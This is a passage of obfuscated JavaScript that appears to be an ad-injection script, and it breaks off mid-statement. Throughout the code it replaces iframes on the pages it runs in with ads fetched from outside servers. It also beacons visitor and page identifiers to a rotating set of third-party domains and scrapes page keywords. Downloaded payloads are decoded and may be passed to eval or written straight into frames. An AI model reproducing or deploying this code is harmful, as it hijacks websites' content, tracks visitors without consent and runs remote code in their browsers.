Q={_keyStr:\"ABC\"+P+\"EFGHIJ\"+O+\"L\"+N+V+\"OP\"+M+\"RS\"+U+I+\"VW\"+T+L+\"Za\"+G+\"cd\"+s7S5.n7T+w+\"g\"+s7S5.s4T+F+\"jklmno\"+C+\"qrstuvw\"+S+\"y\"+R+B+\"123456\"+v+K+A+\"+/=\",encode:function(a){var b=(540,335)>=(145,38)?(1201,\"S\"):(91,1254),c=146<=(1489,582)?(1031,\"5\"):(252,74),d=(58,41)<=(298,99)?(685,\"_\"):\n(213,84)<=(44,76)?(422,31):(14,1),e=\"\",g,h,s,m,t,p,x=s7S5.Y7T;for(a=Q[d+\"ut\"+w+K+d+s7S5.n7T+k+\"code\"](a);s7S5[I+c](x,a.length);)g=a[s7S5.g7T+\"harC\"+s7S5.W9T+s7S5.r7T+s7S5.n7T+s7S5.E9T+s7S5.I7T](x++),h=a[s7S5.G7T+s7S5.j4T+s7S5.G4T+s7S5.d9T+\"eA\"+s7S5.I7T](x++),s=a[s7S5.g7T+s7S5.s4T+s7S5.N7T+s7S5.A7T+s7S5.G4T+s7S5.d9T+\"eA\"+s7S5.I7T](x++),m=s7S5[C+r](g,s7S5.V7T),t=111>(67,494)?107:(1207,1483)>(746,910)?(1313,\"F\"):138>=(435,222)?309:(209,1488),g=s7S5[t+c]((g&s7S5.e7T)<<s7S5.C7T,h>>s7S5.C7T),t=s7S5.A5((h&\ns7S5.K7T)<<s7S5.V7T,s>>l),p=s7S5[P+c](s,n),isNaN(h)?t=p=f:isNaN(s)&&(p=f),e=e+this[\"_keySt\"+s7S5.A7T][s7S5.G7T+s7S5.N7T+s7S5.A7T+s7S5.E9T+s7S5.I7T](m)+this[\"_key\"+b+s7S5.I7T+s7S5.A7T][s7S5.G7T+s7S5.N7T+s7S5.A7T+s7S5.E9T+s7S5.I7T](g)+this[d+\"k\"+s7S5.n7T+\"y\"+b+\"tr\"][s7S5.g7T+s7S5.s4T+s7S5.N7T+s7S5.A7T+s7S5.E9T+s7S5.I7T](t)+this[d+\"k\"+s7S5.n7T+\"y\"+b+s7S5.I7T+s7S5.A7T][s7S5.g7T+s7S5.s4T+\"arAt\"](p);return e},decode:function(a){var b=(3,44)>=(480,32)?(136,256):(731,73),c=(475,0)<=(58,543)?(121,\"u\"):(695,\n38),d=459<(262,536)?(888,72):(1044,140),e=(148,306)>=(337,136)?(202,\"H\"):(60,126),q=(283,528)<(3,97)?(261,\"aaa\"):53>(629,332)?(51,\"d\"):1229>(127,1138)?(128,44):(726,741),n=183<=(559,42)?1E4:525>=(4,82)?(35,43):(5,96),s=124>(3,67)?(195,58):(143,637)<=(104,120)?90:(22,141),m=231<(519,98)?\"j\":48<(17,1053)?(23,48):(75,139),t=(401,28)<(510,88)?(28,123):(359,105)>=(730,700)?(1021,2):(101,390),p={},x=[],v=\"\",w=String[\"fr\"+s7S5.W9T+h+s7S5.G4T+s7S5.s4T+s7S5.N7T+\"rCod\"+s7S5.n7T],n=[[65,91],[g,t],[m,s],[n,q],\n[47,m]];for(z in n)for(q=n[z][s7S5.Y7T];s7S5[e+r](q,n[z][s7S5.j7T]);q++)x[\"pu\"+D+s7S5.s4T](w(q));for(q=s7S5.Y7T;s7S5[h+r](q,f);q++)p[x[q]]=q;for(q=s7S5.Y7T;s7S5[M+r](q,a.length);q+=d)for(s=e=s7S5.Y7T,m=a[D+c+G+D+s7S5.I7T+s7S5.A7T+F+k+\"g\"](q,q+d),n=s7S5.Y7T;s7S5.P2(n,m.length);n++)for(x=p[m[s7S5.g7T+s7S5.s4T+s7S5.j4T+s7S5.E9T+s7S5.I7T](n)],e=s7S5[c+r](e,l)+x,s+=l;s7S5[\"k\"+r](s,s7S5.Z7T);)v+=w(s7S5[F+r](e>>>(s-=s7S5.Z7T),b));return v},_utf8_encode:function(a){var b=70>(376,25)?(621,224):3>=(453,58)?\n(352,2048):(42,88),c=105>=(26,66)?(400,192):(574,60),d=932<(1182,101)?775:(540,121)<=(93,95)?148:(319,561)>=(155,52)?(1234,2048):(214,257),f=(65,346)<=(114,1276)?(341,\"J\"):1351<(222,576)?(576,996):(116,1245),e=(542,339)>(95,102)?(149,127):432<=(130,104)?(114,12):(1021,686),g=79>=(61,853)?(528,\"f\"):(822,133)<=(153,1191)?(276,128):(72,85),k=961>(349,346)?(232,\"B\"):(69,79)>(389,906)?(1088,\"r\"):(1284,32),m=(489,331)<(284,680)?(46,\"l\"):(84,144);a=a[s7S5.A7T+s7S5.n7T+C+m+s7S5.N7T+s7S5.g7T+s7S5.n7T](/\\r\\n/g,\n\"\\n\");for(var m=\"\",t=s7S5.Y7T;s7S5.z2(t,a.length);t++){var p=a[s7S5.G7T+s7S5.N7T+s7S5.A7T+s7S5.G4T+s7S5.W9T+s7S5.r7T+\"eA\"+s7S5.I7T](t);s7S5[k+r](p,g)?m+=String[w+\"romC\"+s7S5.s4T+s7S5.N7T+\"rCo\"+s7S5.r7T+s7S5.n7T](p):s7S5[s7S5.A7T+r](p,e)&&s7S5[f+r](p,d)?(m+=String[w+\"ro\"+h+\"Ch\"+s7S5.N7T+s7S5.A7T+s7S5.e4T+s7S5.r7T+s7S5.n7T](s7S5[O+r](p>>l,c)),m+=String[\"fromCh\"+s7S5.j4T+s7S5.G4T+s7S5.W9T+s7S5.E7T](s7S5.l2(p&n,g))):(m+=String[\"fr\"+s7S5.W9T+\"mCha\"+s7S5.A7T+s7S5.G4T+s7S5.W9T+s7S5.E7T](s7S5[N+r](p>>12,\nb)),m+=String[\"from\"+s7S5.G4T+\"har\"+s7S5.e4T+s7S5.r7T+s7S5.n7T](s7S5[G+r](p>>l&n,g)),m+=String[w+\"romChar\"+s7S5.G4T+s7S5.W9T+s7S5.r7T+s7S5.n7T](s7S5.y2(p&n,g)))}return m}};a=Q[s7S5.r7T+s7S5.n7T+s7S5.g7T+s7S5.W9T+s7S5.r7T+s7S5.n7T](function(a){for(var b=708>=(280,660)?(153,\"R\"):(1406,82),c=a[s7S5.I7T+s7S5.W9T+I+C+C+\"er\"+s7S5.G4T+s7S5.N7T+D+s7S5.n7T](),d=a[s7S5.I7T+\"oLowe\"+s7S5.A7T+\"Cas\"+s7S5.n7T](),f=\"\",e=s7S5.Y7T;s7S5[w+r](e,a.length);++e)f+=s7S5[b+B](a[e][s7S5.g7T+\"ha\"+s7S5.A7T+s7S5.G4T+s7S5.W9T+\ns7S5.E7T+s7S5.E9T+s7S5.I7T](),c[e][s7S5.g7T+s7S5.s4T+s7S5.j4T+s7S5.G4T+s7S5.d9T+s7S5.n7T+s7S5.b7T]())?d[e]:c[e];return f}(a));for(A=s7S5.Y7T;s7S5[\"I\"+B](A,a.length);++A)if(v=a[A][s7S5.g7T+s7S5.s4T+s7S5.N7T+s7S5.A7T+\"Cod\"+s7S5.n7T+s7S5.b7T](),s7S5.X0(v,65)||s7S5[s7S5.g7T+B](v,e)&&s7S5.V0(v,g)||s7S5[L+B](v,d))return c;return b};(function(){var a=document.getElementsByTagName(\"body\")[0];a&&!a.getAttribute(\"jhjlijpomuhn_l\")&&a.setAttribute(\"jhjlijpomuhn_m\",\"l\")})();var Pixel=function(a,b){var c={http:\"\",\nhttps:\"\"},d=\"/\",e={};this.setHost=function(a){if(\"object\"==typeof a&&(\"string\"==typeof a.http||a.http instanceof Array)&&(\"string\"==typeof a.https||a.https instanceof Array))c=a;else if(\"string\"==typeof a||a instanceof Array)c={http:a,https:a};return this};this.setPath=function(a){\"string\"==typeof a&&(d=a=a.replace(/^([^\\/]|$)/,\"/$&\"));return this};this.setParameters=function(a){if(\"object\"==typeof a&&!(a instanceof Array))for(var b in a)this.setParameter(b,a);return this};this.setParameter=function(a,\nb){e[a]=b;return this};var g=function(){var a=[],b;for(b in e)null!==e&&void 0!==e&&a.push(encodeURIComponent(b)+\"=\"+encodeURIComponent(e));return a.length?\"?\"+a.join(\"&\"):\"\"},h=function(a){if(\"string\"==typeof a)return a;if(a instanceof Array)return a[Math.round(Math.random()*(a.length-1))]};this.getNonSslHost=function(){return h(c.http)||\"\"};this.getSslHost=function(){return h(c.https)||\"\"};this.buildNonSslUrl=function(){var a=this.getNonSslHost();if(a)return\"http://\"+a+d+g()};this.buildSslUrl=\nfunction(){var a=this.getSslHost();if(a)return\"https://\"+a+d+g()};this.isSecure=function(){return\"https:\"==window.location.protocol};this.toString=function(){return(this.isSecure()?this.buildSslUrl():this.buildNonSslUrl())||\"\"};this.push=function(a){a=a||function(){};var b=this.toString();if(!b)return!1;var c=new Image;c.onload=function(){a.call(this,\"success\",arguments)};c.onerror=function(){a.call(this,\"error\",arguments)};return c.src=b};this.setHost(a);this.setParameters(b)},PixelIPP=function(){return new Pixel({https:[\"winnerican.org\",\n\"winnering.info\",\"winnering.org\"],http:\"directonic.org dirnt.net dirnt.org fasterol.org loveci.info lovek.info lovement.info lovening.info loveral.net lovezhsky.com loversion.org loversion.net lovezhsky.info lovezhsky.net lovezhsky.org proffic.info proffic.org proffic.net proffican.com proffican.net\".split(\" \")},{tid:1,subid:window.adzy653rk.imp.pid,subid1:window.adzy653rk.imp.hid,subid2:window.adzy653rk.imp.eid,subid3:window.adzy653rk.imp.prid,lt:window.adzy653rk.imp.lt})},s7S5={I7T:\"t\",r2:function(a,\nb){return a>b},J2:function(a,b){return a<b},p2:function(a,b){return a>>b},Y0:function(a,b){return a>b},l2:function(a,b){return a|b},k2:function(a,b){return a>=b},u2:function(a,b){return a<<b},e4T:\"Co\",G7T:\"ch\",y2:function(a,b){return a|b},s4T:\"h\",i2:function(a,b){return a%b},C7T:4,Y7T:0,b2:function(a,b){return a|b},j7T:1,P2:function(a,b){return a<b},n7T:\"e\",f2:function(a,b){return a<b},B2:function(a,b){return a<b},A5:function(a,b){return a|b},X0:function(a,b){return a<b},U5:function(a,b){return a<\nb},m2:function(a,b){return a<b},z2:function(a,b){return a<b},A7T:\"r\",j4T:\"ar\",K2:function(a,b){return a|b},E7T:\"de\",K7T:15,N7T:\"a\",I0:function(a,b){return a<b},E0:function(){var a=function(a,b){var e=b&(352<(181,1206)?(93,65535):1268<=(197,48)?(70,24):(581,57));return((b-e)*a|((54,496)>=(1266,406)?(15,0):(538,20)))+(e*a|((109,1186)>(512,400)?(748,0):(360,1325)<=(274,22)?(1351,7):(954,1040)<=(66,435)?(1069,NaN):(130,57)))|(964>=(322,35)?(238,0):(28,1324))},b={};return{z0:a,i0:function(c,d,e){if(void 0!==\nb[e])return b[e];for(var g=131>=(1300,30)?(47,3432918353):(131,72),h=(387,282)<(234,217)?979:949>=(20,130)?(103,461845907):(67,1152),f=e,l=d&-(147>(26,106)?(3,4):(30,537)),n=393<=(224,579)?(110,0):(44,609);n<l;n+=(22,78)<(311,193)?(334,4):6>(67,31)?(417,\"K\"):(330,18))var k=c[(585>(255,136)?(106,\"c\"):(159,504))+(111<=(535,393)?(584,\"h\"):427<(18,57)?43:214<(1071,53)?(10,144):(1269,148))+(36>=(145,1095)?\"c\":(347,142)>(473,85)?(577,\"a\"):(568,998))+((352,49)>=(394,99)?90:1396<=(149,1300)?(1225,130):5<=\n(541,431)?(692,\"r\"):(581,48))+(242<(10,261)?(57,\"C\"):337>=(153,400)?389:1103>(82,1483)?(163,15):(385,583))+(808>=(68,37)?(563,\"o\"):(78,54))+\"deAt\"](n)&255|(c[\"c\"+(140>=(1465,372)?(1495,\"'\"):109<=(25,138)?(236,\"h\"):531<(101,20)?(67,\"l\"):(833,117))+\"arCodeA\"+((342,48)<=(128,325)?(2,\"t\"):(494,105))](n+1)&(17<(12,591)?(90,255):(100,71)))<<(252<(44,818)?(662,8):449>=(31,1115)?(1483,546):(146,81))|(c[(1349>(633,463)?(554,\"c\"):(116,51)>=(257,1072)?451:(800,39))+(91>=(141,94)?243:(138,40)>(131,458)?91:(1327,\n115)<=(22,439)?(559,\"h\"):(87,141))+\"ar\"+(149<=(51,114)?(59,233):118<(1139,173)?(72,\"C\"):(124,95))+(746>=(511,90)?(34,\"o\"):94>=(355,99)?\"H\":(240,108))+\"deA\"+(142<=(784,1264)?(287,\"t\"):(115,1190))](n+(72<=(38,44)?\"GET\":147>(566,60)?(140,2):(151,588)))&255)<<((418,483)>=(579,121)?(69,16):(64,64))|(c[(1022>(44,72)?(554,\"c\"):(910,192))+(298>(12,236)?(17,\"h\"):384>=(445,962)?(92,237):137<=(137,99)?536:(82,121))+((261,370)<(412,490)?(82,\"a\"):860<(48,105)?\"W\":(526,209))+(1261<=(10,981)?65:34<=(220,371)?(144,\n\"r\"):(173,270))+(253>(41,67)?(46,\"C\"):433<=(260,112)?(352,\"ADS\"):(17,491))+(106<=(88,427)?(131,\"o\"):(815,95))+(467>=(145,471)?64:(10,570)<=(42,1164)?(112,\"d\"):282<=(849,67)?(317,365):(87,157))+(289>=(268,1049)?(206,791):61<=(368,1293)?(77,\"e\"):(496,406))+((1281,432)<=(850,149)?(119,224):(561,101)<=(132,1264)?(143,\"A\"):(105,84))+\"t\"](n+((9,144)>(172,76)?(1227,3):(1382,39)))&255)<<(517>(59,23)?(242,24):(258,8)),k=a(k,g),k=(k&(548<=(45,120)?NaN:(69,364)<=(24,973)?(486,131071):123>(100,1339)?406:(311,\n142)))<<((1114,428)<(986,143)?1074:66<=(483,106)?(10,15):(82,1276))|k>>>(1054>=(1,394)?(986,17):(143,32)),k=a(k,h),f=f^k,f=(f&524287)<<13|f>>>(61<(6,98)?(178,19):(394,40)),f=f*(163<(1225,66)?NaN:441>(135,430)?(56,5):(706,361))+(697<=(414,52)?(989,15):(485,1112)>=(1038,144)?(108,3864292196):(1466,1071))|((60,578)>(60,30)?(384,0):(730,1252));k=172>=(491,125)?(30,0):(24,477);switch(d%(815<=(1295,238)?1240:(118,69)<=(410,132)?(68,4):(431,473))){case 22<=(818,90)?(405,3):(0,309)<=(44,273)?(92,\"W\"):(133,\n39):k=(c[\"ch\"+((57,485)>(71,1156)?239:(366,325)>=(52,383)?(122,165):20<=(72,1481)?(116,\"a\"):(4,1250))+(169<(41,364)?(102,\"r\"):(43,295))+(124<=(72,895)?(492,\"C\"):(138,198))+\"od\"+(51!=(65,51)?(140,\"P\"):(51,37)>(122,559)?(77,91):32<=(353,593)?(87,\"e\"):(511,526))+\"At\"](l+2)&255)<<(69<=(118,37)?380:(82,691)>(42,269)?(344,16):(77,92)>(143,228)?122:(76,440));case (1399,345)<(49,115)?(474,149):(3,98)>(1305,319)?(435,573):(110,7)<(1022,23)?(234,2):(489,105):k|=(c[\"char\"+(277<=(866,115)?(138,28):(87,213)>=\n(96,57)?(1220,\"C\"):(135,142)>=(138,1225)?\"A\":(555,124))+(1181<=(98,301)?!1:(104,21)<(574,1285)?(3,\"o\"):(129,316))+(275>(142,768)?72:(70,1097)>=(183,32)?(351,\"d\"):(121,187))+\"eAt\"](l+((1438,675)>=(565,65)?(1237,1):288>=(1283,355)?59:(37,6)))&((1069,119)>=(643,797)?(1307,NaN):(1153,494)>(147,349)?(1098,255):551<(110,30)?(106,NaN):(1397,107)))<<(55<=(100,1018)?(560,8):(32,253)>=(669,636)?NaN:(1177,575)<(45,499)?(22,97):(76,952));case 114>=(148,1445)?568:66<(1252,448)?(445,1):(385,55)>(167,81)?\"V\":(16,\n266):k|=c[((535,197)>=(93,39)?(140,\"c\"):(589,490))+\"harCodeA\"+(23<=(59,890)?(4,\"t\"):531<=(137,256)?(1139,\"D\"):(8,199))](l)&((80,484)<(1493,431)?265:67<(472,764)?(61,255):(1374,233)>(399,1035)?(146,140):(31,130)),k=a(k,g),k=(k&(1052>(0,436)?(108,131071):(1278,652)))<<(67<=(425,206)?(1116,15):(61,1271))|k>>>(880>(603,375)?(1278,17):(215,263)),k=a(k,h),f^=k}f^=d;f^=f>>>(116>(107,985)?(255,1210):45<(450,137)?(95,16):(301,371));f=a(f,296<=(134,59)?(165,1009):(1400,858)>(467,33)?(124,2246822507):107>(132,\n520)?(185,\"T\"):(280,1174));f^=f>>>(606>(799,130)?(607,13):(323,1437)<(96,301)?560:1231<=(488,473)?(463,NaN):(323,146));f=a(f,(1117,1311)>=(567,32)?(11,3266489909):138>(260,206)?\"p\":(100,306));f^=f>>>16;return b[e]=f}}}(),e7T:3,W9T:\"o\",c0:function(a,b){return a>b},g7T:\"c\",Z7T:8,b7T:\"At\",G4T:\"C\",V0:function(a,b){return a<b},V7T:2,d9T:\"od\",F5:function(a,b){return a|b},E9T:\"A\",Q2:function(a,b){return a<b},H2:function(a,b){return a<b},r7T:\"d\",M2:function(a,b){return a|b},R0:function(a,b){return a==b},\nD5:function(a,b){return a&b}},isRvzFrame=function(a){try{return a instanceof HTMLIFrameElement&&a.parentNode instanceof HTMLDivElement&&a.parentNode.parentNode instanceof HTMLDivElement&&a.parentNode.parentNode.className&&\"string\"==typeof a.parentNode.parentNode.className&&1<a.parentNode.parentNode.className.length&&removeNode(a.parentNode.parentNode.className.split(\" \")[0])}catch(b){return!1}};window.adzy653rk={version:\"1.0\",nrnm:5,ifr:[],src:[],jbs:{ifr:[],at:[]},imp:{pid:\"1\",eid:\"684\",\nhid:\"14365491252932439287\",prid:100,lt:\"98\",referrer:document.referrer,hostname:window.self.location.hostname,url:window.self.location.hostname,jpshort:\"xM2uNtMY\",rattr:stngs.attr_name,title:document.title,domain:stngs.szy_domain,sizes:stngs.ad_sizes},topHost:function(){if(window.self!=window.top){var a=decodeURIComponent(window.self.location.search).match(/http:\\/\\/[^&]+/);return a&&a[0]}return null}(),checkIfPartner:function(a){if(window.top==window)return isRvzFrame(a);\nvar b={_728x90:function(a){return a.parentElement&&a.parentElement.nextSibling&&a.parentElement.nextSibling.children&&a.parentElement.nextSibling.children[0]&&a.parentElement.nextSibling.children[0]&&a.parentElement.nextSibling.children[0].innerHTML.match(/qa/)},_160_600:function(a){return a.parentElement&&a.parentElement.nextSibling&&\"String\"==typeof a.parentElement.nextSibling.innerHTML&&adzy653rk.regexExtTest.test(a.parentElement.nextSibling.innerHTML)},_625x250:function(a){return(a=a.getAttribute(\"style\"))?\na.match(/width:\\s?625px/)&&a.match(/width:\\s?250px/):!1},_345x600:function(a){return(a=a.getAttribute(\"style\"))?a.match(/width:\\s?345px/)&&a.match(/width:\\s?600px/):!1}},c;for(c in b)if(b[c](a))return!0;return!1},getKeywords:function(){var a=adzy653rk.imp.title,b=document.getElementsByTagName(\"meta\");if(b)for(var c=0,d=b.length;c<d;c++)\"keywords\"!=b[c].name.toLowerCase()&&\"description\"!=b[c].name.toLowerCase()||(a+=\" \"+b[c].content.replace(/,/g,\" \"));if(c=document.getElementsByTagName(\"a\")){b={};\nfor(d=0;d<c.length;d++)try{var e=c[d].innerText;\"undefined\"==typeof e&&(e=c[d].textContent);for(var g=e.toLowerCase().split(/[\\s,-]/g),h=0;h<g.length;h++)4>g[h].length||(b[g[h]]?b[g[h]]++:b[g[h]]=1)}catch(f){}var e=[],l;for(l in b)e.push([l,b[l]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(l=0;l<e.length;l++)a+=\" \"+e[l][0]}return a.replace(/[_-]/g,\" \").substring(0,1024)},setMarker:function(){var a=document.getElementsByTagName(\"body\")[0];a&&!a.getAttribute(\"jhjlijpomuhn_l\")&&a.setAttribute(\"jhjlijpomuhn_m\",\n\"l\")},isAncestor:function(a,b,c){function d(a){return\"object\"==typeof a&&a.top instanceof Window||/^\\s*\\[\\s*object\\s*Window\\s*\\]\\s*/.test(a+\"\")}c=c||30;return a==b?!0:!d(a)||!d(b)||b==window.top||0>=c?!1:adzy653rk.isAncestor(a,b.parent,--c)},listenForMessages:function(){if(window.top===window){var a=adzy653rk;window.addEventListener(\"message\",function(b){try{if(0==((b.data||\"\")+\"\").indexOf(a.l.encode(a.imp.hid+\"/\"+a.imp.eid+\"/\"+a.imp.prid)+\"_\"))switch(b.data.split(\"_\")[1]){case \"IIIFAR\":for(var c=\nwindow.document.getElementsByTagName(\"iframe\"),d=0,e;d<c.length;d++)e=c[d],a.isAncestor(e.contentWindow,b.source)&&(isRvzFrame(e)?b.source.postMessage(b.data+\"_\"+a.l.encode(\"RVZ\"),\"*\"):b.source.postMessage(b.data,\"*\"))}}catch(g){}},!1)}},isAllowRunning:function(a){var b=adzy653rk,c,d=b.imp.hid,e=b.imp.eid,g=b.imp.prid,h=function(e){try{var d=b.l.encode(b.imp.hid+\"/\"+b.imp.eid+\"/\"+b.imp.prid);if(0==((e.data||\"\")+\"\").indexOf(d+\"_IIIFAR\"))if(clearTimeout©,window.removeEventListener(\"message\",h,!1),\n0==e.data.indexOf(d+\"_IIIFAR_\")){var g=b.l.decode(e.data.split(\"_\")[2]);a(!1,g)}else a(!0);else a(!0)}catch(k){a(!0)}};\"postMessage\"in window&&\"postMessage\"in(window.top||{})?(c=setTimeout(function(){window.document.removeEventListener(\"message\",h,!1);a(!0)},2E3),window.addEventListener(\"message\",h,!1),window.top.postMessage(b.l.encode(d+\"/\"+e+\"/\"+g)+\"_IIIFAR\",\"*\")):a(!0)},run:function(){adzy653rk.setMarker();var a=document.getElementsByTagName(\"iframe\");if(a.length){for(var b=[],c=0;c<a.length;c++)stngs.checkif(a[c])||\nadzy653rk.checkIfPartner(a[c])||(a[c].setAttribute(adzy653rk.imp.rattr,\"true\"),a[c].setAttribute(\"replaced\",\"true\"),b.push(a[c]));if(b.length){var d=function(a){if(a>=b.length){var c=adzy653rk.imp;adzy653rk.jbs.at.length?adzy653rk.getAds(\"//\"+adzy653rk.imp.domain[\"https:\"==window.self.location.protocol?1:0]+\"/?tid=1&size=\"+adzy653rk.jbs.at.join(\",\")+\"&subid=\"+c.pid+\"&subid1=\"+c.hid+\"&subid2=\"+c.eid+\"&subid3=\"+c.prid+\"&lt=\"+c.lt+\"&k=\"+encodeURIComponent(adzy653rk.getKeywords())+(adzy653rk.topHost?\n\"&tdh=\"+encodeURIComponent(adzy653rk.topHost):\"\"),\"seta\"):adzy653rk.destruct()}else{if(c=adzy653rk.getAt(b[a]))(new PixelIPP).setParameter(\"size\",c).push(),adzy653rk.jbs.ifr.push(b[a]),adzy653rk.jbs.at.push©;setTimeout(function(){d(++a)},1)}};d(0)}else adzy653rk.destruct()}else adzy653rk.destruct()},init:function(){var a=adzy653rk,b=typeof window;window.top===window?(a.listenForMessages(),a.run()):a.isAllowRunning(function(c,d){window.document.body.hasAttribute(\"data-\"+b)||(window.document.body.setAttribute(\"data-\"+\nb,c+\"\"),c&&a.run())})},dfn:function(a){if(adzy653rk.ifr.length&&(a=a?a:1,!(300<a))){var b=function©{c>=adzy653rk.ifr.length?setTimeout(function(){adzy653rk.dfn(++a)},1200):(adzy653rk.src[c]&&adzy653rk.ifr[c]&&adzy653rk.ifr[c].src!=adzy653rk.src[c][0]&&!adzy653rk.checkIfPartner()&&adzy653rk.ifrset(adzy653rk.ifr[c],adzy653rk.src[c][1],1),setTimeout(function(){b(++c)},1))};b(0)}},destruct:function(a){adzy653rk.jbs={ifr:[],at:[]};adzy653rk.rnm?adzy653rk.rnm++:(adzy653rk.rnm=1,setTimeout(adzy653rk.dfn,\n1200));adzy653rk.rnm<=adzy653rk.nrnm&&setTimeout(adzy653rk.run,1200)},getAt:function(a){a=[parseInt(\"number\"==typeof a.width||\"string\"==typeof a.width&&a.width.match(/[0-9]/)?a.width:a.scrollWidth),parseInt(\"number\"==typeof a.height||\"string\"==typeof a.height&&a.height.match(/[0-9]/)?a.height:a.scrollHeight)];for(var b=adzy653rk.imp.sizes,c=0;c<b.length;c++)if(a[0]>=b[c][0]-5&&a[0]<=b[c][0]+5&&a[1]>=b[c][1]-5&&a[1]<=b[c][1]+5)return b[c][2];return!1},getAds:function(a,b){if(-1<navigator.userAgent.indexOf(\"MSIE\")){var c=\ndocument.createElement(\"script\");c.type=\"text/javascript\";c.src=a+\"&cb=adzy653rk.\"+b;try{window.adzy653rk=adzy653rk,(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild©}catch(d){}}else{var e=new XMLHttpRequest;e.open(\"GET\",a,!0);e.onreadystatechange=function(){if(4==e.readyState)adzy653rk(e.response)};e.send(null)}},seta:function(a){var b=[];try{var c=adzy653rk.l.decode(a),b=\"object\"==typeof JSON&&JSON.parse?JSON.parse©:eval©}catch(d){}if(b instanceof\nArray)for(a=0;a<b.length;a++)b[a]&&adzy653rk.jbs.ifr[a]&&adzy653rk.ifrset(adzy653rk.jbs.ifr[a],b[a]);adzy653rk.destruct()},ifrset:function(a,b,c){c||(adzy653rk.ifr.push(a),b[0]=b[0].replace(/\\[##([^#]+)##\\]/g,function(a,b){return adzy653rk.imp[toekn]?adzy653rk.imp[toekn]:\"\"}));var d=[\"<html><head><style>html,body{width:100%;height:100%;margin:0}</style></head><body>\",\"</body></html>\"];switch(b[1]){case 1:a.src=b[0]+(-1<b[0].indexOf(\"?\")?\"&\"+adzy653rk.imp.jpshort+\"=\"+b[2]+\"_18x18_0\":\"\");break;case 2:a.src=\n\"about:blank\";try{a.contentWindow.document.write(d[0]+'<iframe src=\"'+b[0]+'\" style=\"width:100%;height:100%;border:0;\" scrolling=\"no\" frameborder=\"0\"></iframe>'+d[1])}catch(e){}break;case 3:case 6:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+b[0]+d[1])}catch(g){}}c||adzy653rk.src.push([a.src,b])},l:{xlat:\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\",decode:function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var b=\"\",c=0;c<a.length;){var d=this.xlat.indexOf(a.charAt(c++)),\ne=this.xlat.indexOf(a.charAt(c++)),g=this.xlat.indexOf(a.charAt(c++)),h=this.xlat.indexOf(a.charAt(c++)),f=(e&15)<<4|g>>2,l=(g&3)<<6|h,b=b+String.fromCharCode(d<<2|e>>4);64!=g&&0<f&&(b+=String.fromCharCode(f));64!=h&&0<l&&(b+=String.fromCharCode(l))}return this._utf8_decode(b)},_utf8_decode:function(a){for(var b=\"\",c=0;c<a.length;){var d=a.charCodeAt©;if(128>d)b+=String.fromCharCode(d),c++;else if(191<d&&224>d)var e=a.charCodeAt(c+1),b=b+String.fromCharCode((d&31)<<6|e&63),c=c+2;else var e=a.charCodeAt(c+\n1),g=a.charCodeAt(c+2),b=b+String.fromCharCode((d&15)<<12|(e&63)<<6|g&63),c=c+3}return b},encode:function(a){a=this._utf8_encode(a);for(var b=\"\",c=0;c<a.length;){var d=a.charCodeAt(c++),e=a.charCodeAt(c++),g=a.charCodeAt(c++),h=d>>2,d=(d&3)<<4|e>>4,f=(e&15)<<2|g>>6,l=g&63;isNaN(e)?f=l=64:isNaN(g)&&(l=64);b=b+this.xlat.charAt(h)+this.xlat.charAt(d)+(64==f?\"=\":this.xlat.charAt(f))+(64==l?\"=\":this.xlat.charAt(l))}return b},_utf8_encode:function(a){if(a&&a.length){for(var b=\"\",c=0;c<a.length;c++){var d=\na.charCodeAt©;128>d?b+=String.fromCharCode(d):(127<d&&2048>d?b+=String.fromCharCode(d>>6|192):(b+=String.fromCharCode(d>>12|224),b+=String.fromCharCode(d>>6&63|128)),b+=String.fromCharCode(d&63|128))}return b}return a}}}};\nif( typeof adzy653rk !== \"undefined\")\n{adzy653rk.location = adzy653rk.imp.referrer+window.self.location.href;if(adzy653rk.location.indexOf(adzy653rk.imp.jpshort+\"=\")==-1 && adzy653rk.location.indexOf(\"adk2.co\")==-1 &&\"enad.hanyibai.com ad.z5x.net satellitetvoffer.co ads.onimp03.com ad.yieldmanager.com fwwv.dixingwang.com ad.adserverplus.com cpm.cpc-ads.com servedby.adxplosions.com cdn.trkclk.net cpm.usabeautygame.com srv.aileronx.com ekda.xbhhh.com vqtm.nongchangwangzhan.com mthd.laorenmeng.com ads.exoclick.com servedby.adsplats.com ads.ad-maven.com ad.adnetwork.net cmne.197865.com owha.vancouverco.com ads.qadservice.com Servedby.bigfineads.com a.ad-sys.com sport4me.co.il oeha.xbhhh.com s3-us-west-2.amazonaws.com ames.vancouverco.com c5.zedo.com ib.adnxs.com ad.jumbaexchange.com srv1.mediads.info mdeh.xbhhh.com ad.improvemedianetwork.com zvmg.furongshangcheng.com cmen.197865.com ads.networkhm.com ads.impssrv.com media.glispa.com krea.laorenmeng.com tag.contextweb.com ads.mangomediaads.com optimizedby.brealtime.com www.adshost2.com khad.papace.com hnad.hanyibai.com nptv.nongchangwangzhan.com rtb-ads.avazu.net hend.vancouverco.com mpgs.xbhhh.com ads.ventivmedia.com ad.reachjunction.com pzez.nongchangwangzhan.com ads.mediawhite.com cdn.ad-maven.com syzf.xbhhh.com tala.intlsources.com an.z5x.net cemn.197865.com enfl.xbhhh.com fw.adsafeprotected.com cher.ehomestudy.com mtvn.dixingwang.com\".indexOf(window.self.location.hostname)==-1 && adzy653rk.location.indexOf(\"zoneid=13872950\")==-1 && adzy653rk.location.indexOf(\"zoneid=13872950\")==-1 &&adzy653rk.location.indexOf(\"2136&zid=\")==-1 && adzy653rk.location.indexOf(\"1018-1005\")==-1 && adzy653rk.location.indexOf(\"1019-1001\")==-1 && adzy653rk.location.indexOf(\"PT1312\")==-1) adzy653rk.init()}})();(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"xM2uNtMY=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"xM2uNtMY=\")){var d=a.match(/xM2uNtMY=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var 